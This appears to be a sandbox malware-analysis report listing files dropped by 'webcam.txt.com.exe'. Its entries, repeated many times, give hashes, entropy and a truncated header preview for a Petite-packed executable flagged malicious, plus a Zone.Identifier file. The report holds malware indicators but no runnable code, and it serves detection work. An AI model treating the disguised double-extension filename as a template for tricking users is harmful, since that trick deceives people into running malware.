                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
